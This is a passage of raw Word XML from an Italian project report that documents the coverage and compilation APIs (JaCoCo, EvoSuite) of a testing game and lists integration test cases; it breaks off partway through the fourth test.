    <w:p w14:paraId="16BF2788" w14:textId="77777777" w:rsidR="00236C0D" w:rsidRPr="00715086" w:rsidRDefault="00236C0D" w:rsidP="0055772E"/>
    <w:p w14:paraId="74B24B45" w14:textId="77777777" w:rsidR="00236C0D" w:rsidRPr="00715086" w:rsidRDefault="00236C0D" w:rsidP="0055772E"/>
    <w:p w14:paraId="1E7336DA" w14:textId="77777777" w:rsidR="00236C0D" w:rsidRPr="00715086" w:rsidRDefault="00236C0D" w:rsidP="0055772E"/>
    <w:p w14:paraId="5709C2C9" w14:textId="77777777" w:rsidR="000A2CD0" w:rsidRPr="00715086" w:rsidRDefault="000A2CD0" w:rsidP="0055772E"/>
    <w:p w14:paraId="760158CB" w14:textId="5327B7D9" w:rsidR="00621119" w:rsidRPr="00715086" w:rsidRDefault="00621119" w:rsidP="00621119">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="_Toc148195749"/>
      <w:r w:rsidRPr="00715086">
        <w:lastRenderedPageBreak/>
        <w:t>4 Documentazione API</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w14:paraId="5FAA41F7" w14:textId="27C45FAD" w:rsidR="00621119" w:rsidRPr="00715086" w:rsidRDefault="00C943E9" w:rsidP="00C943E9">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_Toc148195750"/>
      <w:r w:rsidRPr="00715086">
        <w:t>4.1 getCoverage</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:p w14:paraId="6AE0A1D2" w14:textId="6DBFBF56" w:rsidR="00715086" w:rsidRDefault="00DA641D" w:rsidP="0055772E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251675648" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3ECEEFCD" wp14:editId="6F39F1DA">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>-521970</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>791845</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7159625" cy="1097280"/>
            <wp:effectExtent l="0" t="0" r="3175" b="7620"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="105260659" name="Immagine 6"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0659" name="Immagine 6" descr="Immagine che contiene testo, schermata, linea,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59625" cy="1097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61FE3E17" wp14:editId="46D8336F">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>182880</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1881505</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7185660" cy="2389505"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="668239918" name="Immagine 8"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39918" name="Immagine 8" descr="Immagine che contiene testo, Carattere, schermata, numer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85660" cy="2389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3C7B0C82" wp14:editId="7B139D8D">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>-532765</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>4270375</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7185660" cy="683260"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="190040047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00474" name="Immagine 190040047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85660" cy="683260"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="margin">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="margin">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00715086">
        <w:t>Questa API richiede il servizio di Compilazione e copertura di utente e robot.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Nel body di richiesta va indicato il nome della classe sotto test, mentre nel body di risposta avremo le informazioni di compilazione della classe, di copertura dell’utente e la percentuale di copertura del robot (Randoop o EvoSuite) per la classe sotto test con la quale sto giocando</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46CC763F" w14:textId="77777777" w:rsidR="00C943E9" w:rsidRDefault="00C943E9" w:rsidP="0055772E"/>
    <w:p w14:paraId="2B837E2F" w14:textId="77777777" w:rsidR="00DA641D" w:rsidRDefault="00DA641D" w:rsidP="0055772E"/>
    <w:p w14:paraId="235ADDA4" w14:textId="77777777" w:rsidR="00DA641D" w:rsidRDefault="00DA641D" w:rsidP="0055772E"/>
    <w:p w14:paraId="3ECBCAE8" w14:textId="77777777" w:rsidR="00DA641D" w:rsidRDefault="00DA641D" w:rsidP="0055772E"/>
    <w:p w14:paraId="0659E6E7" w14:textId="77777777" w:rsidR="00DA641D" w:rsidRDefault="00DA641D" w:rsidP="0055772E"/>
    <w:p w14:paraId="74CD4D59" w14:textId="77777777" w:rsidR="00DA641D" w:rsidRDefault="00DA641D" w:rsidP="0055772E"/>
    <w:p w14:paraId="12313E2E" w14:textId="77777777" w:rsidR="00DA641D" w:rsidRDefault="00DA641D" w:rsidP="0055772E"/>
    <w:p w14:paraId="419C044F" w14:textId="77777777" w:rsidR="00DA641D" w:rsidRDefault="00DA641D" w:rsidP="0055772E"/>
    <w:p w14:paraId="49B2AA91" w14:textId="77777777" w:rsidR="00DA641D" w:rsidRDefault="00DA641D" w:rsidP="0055772E"/>
    <w:p w14:paraId="32D69E9C" w14:textId="77777777" w:rsidR="00DA641D" w:rsidRDefault="00DA641D" w:rsidP="0055772E"/>
    <w:p w14:paraId="15D7213B" w14:textId="77777777" w:rsidR="00DA641D" w:rsidRPr="00715086" w:rsidRDefault="00DA641D" w:rsidP="0055772E"/>
    <w:p w14:paraId="56F80151" w14:textId="46A438F1" w:rsidR="00C943E9" w:rsidRPr="00715086" w:rsidRDefault="00C943E9" w:rsidP="00C943E9">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="_Toc148195751"/>
      <w:r w:rsidRPr="00715086">
        <w:lastRenderedPageBreak/>
        <w:t>4.2 compile-and-codecoverage (JaCoCo)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
    </w:p>
    <w:p w14:paraId="097D5785" w14:textId="2410E333" w:rsidR="006E0747" w:rsidRPr="00715086" w:rsidRDefault="006E0747" w:rsidP="0055772E">
      <w:r w:rsidRPr="00715086">
        <w:t>Nella nostra applicazione il container che ospita il coverage-server non è esposto verso l’esterno, infatti l’unico porto esposto è il porto 80. Per poter testare questa API tramite Postman allora abbiamo modificato il docker-compose.yml in modo tale da esporre il coverage-server sul porto 1234.</w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:br/>
        <w:t>In particolare stiamo richiedendo il servizio di misurazione della coverage a JaCoCo</w:t>
      </w:r>
      <w:r w:rsidR="00715086" w:rsidRPr="00715086">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7750F7" w14:textId="0326248F" w:rsidR="006E0747" w:rsidRPr="00715086" w:rsidRDefault="006E0747" w:rsidP="0055772E">
      <w:r w:rsidRPr="00715086">
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251670528" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2C9F606E" wp14:editId="11674015">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>-548005</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>601345</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7199630" cy="1618615"/>
            <wp:effectExtent l="0" t="0" r="1270" b="635"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="49952591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25912" name="Immagine 1" descr="Immagine che contiene testo, schermata, Carattere&#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99630" cy="1618615"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="margin">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="margin">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251672576" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="12DC8249" wp14:editId="29DDE254">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>-554355</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>2206625</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7211695" cy="2286000"/>
            <wp:effectExtent l="0" t="0" r="8255" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="380567210" name="Immagine 3"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7210" name="Immagine 3" descr="Immagine che contiene testo, Carattere, schermata, documen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11695" cy="2286000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="margin">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="margin">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251671552" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="614175CC" wp14:editId="70F609AB">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>-544830</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>4492625</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7199630" cy="1417955"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="1144610649" name="Immagine 2"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10649" name="Immagine 2" descr="Immagine che contiene testo, Carattere, documento, schermat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9630" cy="1417955"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="margin">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="margin">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:t xml:space="preserve">Nel body della richiesta vengono passati 4 parametri: nome e codice della classe di test e della classe sotto test. Nel body di risposta abbiamo l’output di compilazione, un flag che ci dice se ci sono stati errori di compilazione e </w:t>
      </w:r>
      <w:r w:rsidR="00715086">
        <w:t>il campo</w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:t xml:space="preserve"> coverage</w:t>
      </w:r>
      <w:r w:rsidR="00715086">
        <w:t xml:space="preserve"> sottoforma di xml</w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:t xml:space="preserve"> (campi dell’oggetto ResponseDTO).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB604E8" w14:textId="704BBC5A" w:rsidR="00C943E9" w:rsidRPr="00715086" w:rsidRDefault="00C943E9" w:rsidP="0055772E"/>
    <w:p w14:paraId="4DD4C8E6" w14:textId="79CDE7AC" w:rsidR="006E0747" w:rsidRPr="00715086" w:rsidRDefault="006E0747" w:rsidP="0055772E"/>
    <w:p w14:paraId="07CC7A89" w14:textId="5477E04F" w:rsidR="006E0747" w:rsidRPr="00715086" w:rsidRDefault="006E0747" w:rsidP="0055772E"/>
    <w:p w14:paraId="7E94520F" w14:textId="77777777" w:rsidR="006E0747" w:rsidRDefault="006E0747" w:rsidP="0055772E"/>
    <w:p w14:paraId="402EA000" w14:textId="77777777" w:rsidR="00DA641D" w:rsidRDefault="00DA641D" w:rsidP="0055772E"/>
    <w:p w14:paraId="09B7E889" w14:textId="77777777" w:rsidR="00DA641D" w:rsidRPr="00715086" w:rsidRDefault="00DA641D" w:rsidP="0055772E"/>
    <w:p w14:paraId="066BED31" w14:textId="682904F5" w:rsidR="00C943E9" w:rsidRPr="00715086" w:rsidRDefault="00715086" w:rsidP="006E0747">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="_Toc148195752"/>
      <w:r w:rsidRPr="00715086">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">4.3 </w:t>
      </w:r>
      <w:r w:rsidR="00C943E9" w:rsidRPr="00715086">
        <w:t>compile-and-</w:t>
      </w:r>
      <w:r w:rsidR="00C943E9" w:rsidRPr="00715086">
        <w:t>code</w:t>
      </w:r>
      <w:r w:rsidR="00C943E9" w:rsidRPr="00715086">
        <w:t xml:space="preserve">coverage </w:t>
      </w:r>
      <w:r w:rsidR="00C943E9" w:rsidRPr="00715086">
        <w:t>(EvoSuite)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>
    </w:p>
    <w:p w14:paraId="0E4B2FBD" w14:textId="5B206A5D" w:rsidR="00621119" w:rsidRDefault="00715086" w:rsidP="0055772E">
      <w:r w:rsidRPr="00715086">
        <w:t xml:space="preserve">Anche in questo caso </w:t>
      </w:r>
      <w:r>
        <w:t>è stato necessario esporre il porto 5000 del container evosuite-server per richiedere il servizio tramite Postman.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">In particolare stiamo richiedendo il servizio di misurazione della coverage a JaCoCo. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC4524B" w14:textId="72FEFA23" w:rsidR="00715086" w:rsidRDefault="00715086" w:rsidP="0055772E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251674624" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="699A3135" wp14:editId="412BC7CA">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>-553085</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>2194560</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7218045" cy="2913380"/>
            <wp:effectExtent l="0" t="0" r="1905" b="1270"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="1000855298" name="Immagine 5"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5298" name="Immagine 5" descr="Immagine che contiene testo, schermata, Carattere, document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18045" cy="291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117EDC8D" wp14:editId="7D1F9F36">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>480695</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7218045" cy="1722120"/>
            <wp:effectExtent l="0" t="0" r="1905" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="856207048" name="Immagine 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07048" name="Immagine 4" descr="Immagine che contiene testo, schermata, Carattere&#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18045" cy="1722120"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="margin">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="margin">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t>I campi del body della richiesta sono gli stessi di 4.2, mentre nel body di risposta ciò che cambia è il contenuto della coverage, che è un csv invece che un xml.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0511E6B9" w14:textId="6255071E" w:rsidR="00715086" w:rsidRPr="00715086" w:rsidRDefault="00715086" w:rsidP="0055772E"/>
    <w:p w14:paraId="32464630" w14:textId="77777777" w:rsidR="00621119" w:rsidRPr="00715086" w:rsidRDefault="00621119" w:rsidP="0055772E"/>
    <w:p w14:paraId="76E4767C" w14:textId="77777777" w:rsidR="00621119" w:rsidRPr="00715086" w:rsidRDefault="00621119" w:rsidP="0055772E"/>
    <w:p w14:paraId="2D9F9B45" w14:textId="77777777" w:rsidR="00621119" w:rsidRPr="00715086" w:rsidRDefault="00621119" w:rsidP="0055772E"/>
    <w:p w14:paraId="2D511D6D" w14:textId="77777777" w:rsidR="00621119" w:rsidRPr="00715086" w:rsidRDefault="00621119" w:rsidP="0055772E"/>
    <w:p w14:paraId="2A1F030F" w14:textId="77777777" w:rsidR="00621119" w:rsidRPr="00715086" w:rsidRDefault="00621119" w:rsidP="0055772E"/>
    <w:p w14:paraId="2533B6AE" w14:textId="77777777" w:rsidR="00BC5849" w:rsidRPr="00715086" w:rsidRDefault="00BC5849" w:rsidP="0055772E"/>
    <w:p w14:paraId="3DF1A545" w14:textId="77777777" w:rsidR="00BC5849" w:rsidRPr="00715086" w:rsidRDefault="00BC5849" w:rsidP="0055772E"/>
    <w:p w14:paraId="1A338DDF" w14:textId="77777777" w:rsidR="00BC5849" w:rsidRPr="00715086" w:rsidRDefault="00BC5849" w:rsidP="0055772E"/>
    <w:p w14:paraId="3DB4722F" w14:textId="77777777" w:rsidR="00BC5849" w:rsidRPr="00715086" w:rsidRDefault="00BC5849" w:rsidP="0055772E"/>
    <w:p w14:paraId="7F66D845" w14:textId="6F6096E0" w:rsidR="000A2CD0" w:rsidRPr="00715086" w:rsidRDefault="00621119" w:rsidP="00247D47">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
      </w:pPr>
      <w:bookmarkStart w:id="36" w:name="_Toc148195753"/>
      <w:r w:rsidRPr="00715086">
        <w:lastRenderedPageBreak/>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00247D47" w:rsidRPr="00715086">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000A2CD0" w:rsidRPr="00715086">
        <w:t>Testing</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
    </w:p>
    <w:p w14:paraId="7083EA11" w14:textId="101DBC16" w:rsidR="00621119" w:rsidRPr="00715086" w:rsidRDefault="00621119" w:rsidP="00621119">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="_Toc148195754"/>
      <w:r w:rsidRPr="00715086">
        <w:t>5.1 Test di integrazione</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
    </w:p>
    <w:p w14:paraId="5DFEA4F0" w14:textId="085CF086" w:rsidR="000A2CD0" w:rsidRPr="00715086" w:rsidRDefault="000A2CD0" w:rsidP="0055772E">
      <w:r w:rsidRPr="00715086">
        <w:t>Il test di integrazione è necessario per verificare la corretta interazione dei moduli tra loro.</w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:br/>
        <w:t>Sono stati individuati i seguenti test:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DC3B3D" w14:textId="7FDC03FC" w:rsidR="000A2CD0" w:rsidRPr="00715086" w:rsidRDefault="000A2CD0">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>Test1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118DCB70" w14:textId="2A6E0ED1" w:rsidR="000A2CD0" w:rsidRPr="00715086" w:rsidRDefault="000A2CD0" w:rsidP="000A2CD0">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>Descrizione: Compilazione</w:t>
      </w:r>
      <w:r w:rsidR="00D1165A" w:rsidRPr="00715086">
        <w:t>, Esecuzione e Calcolo Coverage con JaCoCo di una classe di test valida</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4624A5B6" w14:textId="7B53BF4C" w:rsidR="000A2CD0" w:rsidRPr="00715086" w:rsidRDefault="000A2CD0" w:rsidP="000A2CD0">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>Precondizioni: l’utente ha correttamente scritto una classe di test</w:t>
      </w:r>
      <w:r w:rsidR="008C774D" w:rsidRPr="00715086">
        <w:t>, e anche il robot l’ha correttamente generata</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0373F52C" w14:textId="67FFCF12" w:rsidR="000A2CD0" w:rsidRPr="00715086" w:rsidRDefault="000A2CD0" w:rsidP="000A2CD0">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t xml:space="preserve">Input: </w:t>
      </w:r>
      <w:r w:rsidR="008C774D" w:rsidRPr="00715086">
        <w:t>clicca sul bottone “</w:t>
      </w:r>
      <w:r w:rsidR="001D679E" w:rsidRPr="00715086">
        <w:t>Play</w:t>
      </w:r>
      <w:r w:rsidR="008C774D" w:rsidRPr="00715086">
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB0A31D" w14:textId="49E208D2" w:rsidR="000A2CD0" w:rsidRPr="00715086" w:rsidRDefault="000A2CD0" w:rsidP="007B62EF">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>Output atteso:</w:t>
      </w:r>
      <w:r w:rsidR="008C774D" w:rsidRPr="00715086">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001D679E" w:rsidRPr="00715086">
        <w:t xml:space="preserve">viene mostrato l’output di compilazione dell’utente, la </w:t>
      </w:r>
      <w:r w:rsidR="008C774D" w:rsidRPr="00715086">
        <w:t>coverage di utente e robot</w:t>
      </w:r>
      <w:r w:rsidR="001D679E" w:rsidRPr="00715086">
        <w:t>, il vincitore della partita</w:t>
      </w:r>
      <w:r w:rsidR="00E85125" w:rsidRPr="00715086">
        <w:t>, e vengono evidenziate le linee di codice coperte</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F147E42" w14:textId="77777777" w:rsidR="00E85125" w:rsidRPr="00715086" w:rsidRDefault="00E85125" w:rsidP="007B62EF">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="254FD403" w14:textId="339683DC" w:rsidR="00E85125" w:rsidRPr="00715086" w:rsidRDefault="00E85125">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>Test2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02854E63" w14:textId="50762F53" w:rsidR="00E85125" w:rsidRPr="00715086" w:rsidRDefault="00E85125" w:rsidP="00E85125">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>Descrizione: Compilazione, Esecuzione e Calcolo Coverage con EvoSuite di una classe di test valida</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1CD087" w14:textId="77777777" w:rsidR="00E85125" w:rsidRPr="00715086" w:rsidRDefault="00E85125" w:rsidP="00E85125">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>Precondizioni: l’utente ha correttamente scritto una classe di test, e anche il robot l’ha correttamente generata</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F78BD77" w14:textId="77777777" w:rsidR="00E85125" w:rsidRPr="00715086" w:rsidRDefault="00E85125" w:rsidP="00E85125">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>Input: clicca sul bottone “Play”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30067328" w14:textId="78C7885A" w:rsidR="00E85125" w:rsidRPr="00715086" w:rsidRDefault="00E85125" w:rsidP="00E85125">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>Output atteso: viene mostrato l’output di compilazione dell’utente, la coverage di utente e robot, e il vincitore della partita</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68886254" w14:textId="77777777" w:rsidR="007B62EF" w:rsidRPr="00715086" w:rsidRDefault="007B62EF" w:rsidP="007B62EF">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FC20EAC" w14:textId="67450657" w:rsidR="000A2CD0" w:rsidRPr="00715086" w:rsidRDefault="000A2CD0">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>Test</w:t>
      </w:r>
      <w:r w:rsidR="00E85125" w:rsidRPr="00715086">
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B9E9E0" w14:textId="3B7C80E4" w:rsidR="000A2CD0" w:rsidRPr="00715086" w:rsidRDefault="000A2CD0" w:rsidP="000A2CD0">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t xml:space="preserve">Descrizione: </w:t>
      </w:r>
      <w:r w:rsidR="001D679E" w:rsidRPr="00715086">
        <w:t>Compilazione, Esecuzione e Calcolo Coverage con JaCoCo di una classe di test con errori</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414E06EC" w14:textId="438AF1DF" w:rsidR="000A2CD0" w:rsidRPr="00715086" w:rsidRDefault="000A2CD0" w:rsidP="000A2CD0">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>Precondizioni:</w:t>
      </w:r>
      <w:r w:rsidR="008C774D" w:rsidRPr="00715086">
        <w:t xml:space="preserve"> errore sintattico nella classe di test dell’utente</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696C6FB0" w14:textId="745FAF5D" w:rsidR="000A2CD0" w:rsidRPr="00715086" w:rsidRDefault="000A2CD0" w:rsidP="000A2CD0">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>Input:</w:t>
      </w:r>
      <w:r w:rsidR="008C774D" w:rsidRPr="00715086">
        <w:t xml:space="preserve"> clicca sul bottone “</w:t>
      </w:r>
      <w:r w:rsidR="001D679E" w:rsidRPr="00715086">
        <w:t>Play</w:t>
      </w:r>
      <w:r w:rsidR="008C774D" w:rsidRPr="00715086">
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04441CDC" w14:textId="53310D93" w:rsidR="008C774D" w:rsidRPr="00715086" w:rsidRDefault="000A2CD0" w:rsidP="007B62EF">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>Output atteso:</w:t>
      </w:r>
      <w:r w:rsidR="008C774D" w:rsidRPr="00715086">
        <w:t xml:space="preserve"> viene mostrato un messaggio di errore: “Errore nel test dell’utente”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303443E4" w14:textId="77777777" w:rsidR="00E85125" w:rsidRPr="00715086" w:rsidRDefault="00E85125" w:rsidP="007B62EF">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21834AF7" w14:textId="54B69BF5" w:rsidR="00E85125" w:rsidRPr="00715086" w:rsidRDefault="00E85125">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>Test4:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44DFA6D8" w14:textId="0F5D44EC" w:rsidR="00E85125" w:rsidRPr="00715086" w:rsidRDefault="00E85125" w:rsidP="00E85125">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
      </w:pPr>
